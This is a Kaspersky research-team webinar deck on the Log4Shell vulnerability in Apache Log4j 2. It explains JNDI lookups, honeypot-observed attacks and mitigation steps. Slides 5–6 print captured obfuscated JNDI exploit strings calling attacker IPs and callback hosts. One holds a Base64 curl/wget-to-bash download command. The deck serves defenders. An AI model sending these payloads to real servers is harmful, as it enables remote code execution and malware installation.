SlideShare a Scribd company logo
4
Most read
5
Most read
10
Most read
Vulnerability: “Log4Shell”
[CVE-2021-44228]
•
Global Research and Analysis Team (GReAT)
Kaspersky
Dan Demeter, Marc Rivero, Marco Preuss
Webinar 12.2021
We are
Global Research and Analysis Team
Operational since 2008
Globally distributed elite threats research group
APTs, complex and highly
sophisticated targeted
attacks, big threats against
banks/financial institutions,
firmware threats…
3
How it started…
https://archive.md/xD3OO
Log4Shell
4
The Vulnerability
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://logging.apache.org/log4j/2.x/download.html
https://logging.apache.org/log4j/2.x/changes-report.html
Summary:
- vulnerability in “Apache Log4j 2”
- 0-day released on 09.12.2021
- Remote code execution
- PoC-Code is available
- Widely used component in commercial and open-source applications
- Severity: critical
- affected: version 2.0 <= 2.14.1
2.15.0-rc1 pot. still included a bypass an implemented fix
- Fixed version: 2.16.0
- CVE-2021-44228 created 2021.11.26
- NIST NVD published 10.12.2021
- Version 2.0 was released on 2014-07-12 [more than 7 years ago!]
- Attack vector for JNDi, presented at Blackhat in 2016
Log4Shell
5
Exploiting example:
${jndi:ldap[:]//malicious.xyz/x}
${jndi:[service]://[host].[port]/[path]}
JNDI: Java Naming and Directory Interface
LDAP: Lightweight Directory Access Protocol
JNDI is a JAVA-internal API or SPI (Service Provider Interface)
e.g. methods to query information based on names like LDAP, DNS,
NIS, CORBA etc.
Some things to know
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
HTTP request
6
${jndi%3aldap%3a//0ky8rj5089x9qx7tq8djb3rpp.canarytokens[.]com/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName:user:env}.c6340b92vtc0
0002scfggdpcz9eyyyyyd.interactsh[.]com}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160[.]149:12344/Basic/Com
mand/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC80NS41Ni45Mi4
yMjk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNDUuNTYu
OTIuMjI5OjgwKXxiYXNo}
${jndi:ldap:/5819.u837r4g5oolsy8hudoz24c15nwtohd.burpcollaborator[.]net/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV
_NAME:-:}//62.182.80.168:1389/pien3m}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}://
67.205.191.102:1389/koejir}}
What we could observe in our honeypot network? - Modifications made by the attackers
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
7
8
How the attack chain works? - First pair of requests
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
9
How the attack chain works? - Second pair of requests
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
10
How the attack chain works? - Latest event observed in our honeypots
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
11
How the attack chain works? - Latest event observed in our honeypots
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
12
How the attack chain works? - Kinsing malware
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
13
Attacker by Countries
will be added thursday
afternoon with fresh data
14
statistics 2
will be added thursday
afternoon with fresh data
15
D
Alternative if you can not patch
Mitigate as outlined by Apache.org¹
use WAF, IPS, Webserver-block-rules
use IDS, Yara, Sigma for detection
C Check Logs
Monitor application logs
use IDS and tools to identify
attacks
B
Update log4j 2
latest version: 2.16.0
https://logging.apache.org/log4j/2.x
/download.html
A
Identify installed log4j
check your running software
Solve/mitigate
CVE-2021-44228
What organisations should do
¹https://logging.apache.org/log4j/2.x/security.html
Kaspersky products protect!
- UMIDS:Intrusion.Generic.CVE-2021-44228.*
- PDM:Exploit.Win32.Generic
16
further references/reading/material
Websites:
• Securelist: https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/
• NCSC (NL): https://github.com/NCSC-NL/log4shell
• Blocklist by Costin Raiu and Markus Neis: https://github.com/craiu/iocs/tree/main/log4shell
• Apache Log4j 2 official security: https://logging.apache.org/log4j/2.x/security.html
Twitter:
• Marc Rivero López: @Seifreed
• Dan Demeter: @_xdanx
• Marco Preuss: @marco_preuss
Feel free to follow on LinkedIn and other channels as well!
Thank you! Let’s talk
Dan Demeter, Marc Rivero, Marco Preuss

More Related Content

PDF
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
PPT
Security Vulnerabilities
PDF
Privilege escalation from 1 to 0 Workshop
PDF
Hunting for Credentials Dumping in Windows Environment
PDF
PDF
Neat tricks to bypass CSRF-protection
PDF
Burp suite
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
Security Vulnerabilities
Privilege escalation from 1 to 0 Workshop
Hunting for Credentials Dumping in Windows Environment
Neat tricks to bypass CSRF-protection
Burp suite

What's hot (20)

PPTX
Jhon the ripper
PPTX
Metasploit
PPTX
Sql injections - with example
PDF
No Easy Breach DerbyCon 2016
PDF
Windows attacks - AT is the new black
PDF
PPTX
PPTX
Wazuh Security Platform
PDF
Introduction to burp suite
PPTX
Ethical Hacking n VAPT presentation by Suvrat jain
PDF
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
PPTX
Security testing
PPTX
Introduction to Malware Analysis
PPTX
PPTX
Metasploit framwork
PPTX
Metasploit framework in Network Security
PDF
Log4Shell Case Study - Suricon2022.pdf
PPTX
Reconnaissance - For pentesting and user awareness
PPTX
SSRF For Bug Bounties
PDF
Nessus Software
Jhon the ripper
Metasploit
Sql injections - with example
No Easy Breach DerbyCon 2016
Windows attacks - AT is the new black
Wazuh Security Platform
Introduction to burp suite
Ethical Hacking n VAPT presentation by Suvrat jain
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
Security testing
Introduction to Malware Analysis
Metasploit framwork
Metasploit framework in Network Security
Log4Shell Case Study - Suricon2022.pdf
Reconnaissance - For pentesting and user awareness
SSRF For Bug Bounties
Nessus Software
Ad

Similar to The Log4Shell Vulnerability – explained: how to stay secure (20)

PPTX
The Log4Shell Vulnerability – explained: how to stay secure
PDF
OWASP Europe Summit Portugal 2008. Web Application Assessments
PDF
Threats, Threat Modeling and Analysis
PPTX
Sandbox kiev
DOCX
FBI & Secret Service- Business Email Compromise Workshop
PDF
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
PDF
ENPM808 Independent Study Final Report - amaster 2019
PPTX
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
PPTX
Penetration testing dont just leave it to chance
PPTX
Project Presentation
PPT
Penetration Testing Basics
PDF
BSides IR in Heterogeneous Environment
PPTX
Catch Me If You Can - Finding APTs in your network
PPTX
Managing Security in External Software Dependencies
PPTX
Managing Security in External Software Dependencies
PDF
Rahul-Analysis_of_Adversarial_Code
PDF
Continuous Security: From tins to containers - now what!
PDF
Web application penetration testing lab setup guide
PPTX
Functional and Behavioral Analysis of Different Type of Ransomware.pptx
PDF
website vulnerability scanner and reporter research paper
The Log4Shell Vulnerability – explained: how to stay secure
OWASP Europe Summit Portugal 2008. Web Application Assessments
Threats, Threat Modeling and Analysis
Sandbox kiev
FBI & Secret Service- Business Email Compromise Workshop
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
ENPM808 Independent Study Final Report - amaster 2019
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Penetration testing dont just leave it to chance
Project Presentation
Penetration Testing Basics
BSides IR in Heterogeneous Environment
Catch Me If You Can - Finding APTs in your network
Managing Security in External Software Dependencies
Managing Security in External Software Dependencies
Rahul-Analysis_of_Adversarial_Code
Continuous Security: From tins to containers - now what!
Web application penetration testing lab setup guide
Functional and Behavioral Analysis of Different Type of Ransomware.pptx
website vulnerability scanner and reporter research paper
Ad

More from Kaspersky (20)

PPTX
A look at current cyberattacks in Ukraine
PDF
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
PDF
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
PDF
Кирилл Набойщиков. Системный подход к защите КИИ
PDF
Вениамин Левцов. Cтратегия трансформации решений Лаборатории Касперского для ...
PDF
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
PDF
Мария Гарнаева. Целевые атаки на промышленные компании в 2020/2021
PDF
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
PDF
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
PDF
Глеб Дьяконов. ИИ-видеоаналитика как инструмент корпоративного риск-менеджмен...
PDF
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
PDF
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
PDF
Марина Сорокина. Криптография для промышленных систем
PDF
Александр Лифанов. Платформа граничных вычислений Siemens Industrial Edge: пе...
PDF
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
PDF
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
PDF
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
PDF
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
PDF
Василий Шауро. Развитие кибербезопасности АСУТП ​в условиях цифровизации пред...
PDF
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...
A look at current cyberattacks in Ukraine
Алексей Гуревич. Кибербезопасность систем управления современных объектов эле...
Максим Бородько. Спуфинг GNSS — новая угроза для критической инфраструктуры
Кирилл Набойщиков. Системный подход к защите КИИ
Вениамин Левцов. Cтратегия трансформации решений Лаборатории Касперского для ...
Джан Демирел (Турция). Текущий статус регулирования промышленной кибербезопас...
Мария Гарнаева. Целевые атаки на промышленные компании в 2020/2021
Дмитрий Правиков. Концепция информационной безопасности «роя» киберфизических...
Андрей Суворов, Максим Карпухин. Сенсация под микроскопом. Вивисекция первого...
Глеб Дьяконов. ИИ-видеоаналитика как инструмент корпоративного риск-менеджмен...
Игорь Рыжов. Проекты по защите АСУ ТП вчера, сегодня, завтра
Александр Карпенко. Уровни зрелости АСУ ТП как объектов защиты и подходы к ун...
Марина Сорокина. Криптография для промышленных систем
Александр Лифанов. Платформа граничных вычислений Siemens Industrial Edge: пе...
Александр Волошин. Киберполигон "Цифровая энергетика". Исследования и разрабо...
Евгений Дружинин. Как не сломать: что важно учесть перед, в ходе и после реал...
Алексей Иванов. Реализация проектов АСУ ТП электрических подстанций ​в соотве...
Олег Шакиров. Дипломатия и защита критической инфраструктуры от киберугроз
Василий Шауро. Развитие кибербезопасности АСУТП ​в условиях цифровизации пред...
Константин Родин. Обеспечение доверенной среды удаленной работы в рамках ​про...

Recently uploaded (20)

PDF
Empathic Computing: Creating Shared Understanding
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PPTX
OMC Textile Division Presentation 2021.pptx
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PPTX
Machine Learning_overview_presentation.pptx
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
Getting Started with Data Integration: FME Form 101
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
August Patch Tuesday
PPT
Teaching material agriculture food technology
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
PDF
Heart disease approach using modified random forest and particle swarm optimi...
PDF
MIND Revenue Release Quarter 2 2025 Press Release
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PPTX
Programs and apps: productivity, graphics, security and other tools
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
Empathic Computing: Creating Shared Understanding
NewMind AI Weekly Chronicles - August'25-Week II
OMC Textile Division Presentation 2021.pptx
Univ-Connecticut-ChatGPT-Presentaion.pdf
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Machine Learning_overview_presentation.pptx
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Advanced methodologies resolving dimensionality complications for autism neur...
Getting Started with Data Integration: FME Form 101
Encapsulation_ Review paper, used for researhc scholars
August Patch Tuesday
Teaching material agriculture food technology
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
Heart disease approach using modified random forest and particle swarm optimi...
MIND Revenue Release Quarter 2 2025 Press Release
Per capita expenditure prediction using model stacking based on satellite ima...
Digital-Transformation-Roadmap-for-Companies.pptx
Programs and apps: productivity, graphics, security and other tools
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf

The Log4Shell Vulnerability – explained: how to stay secure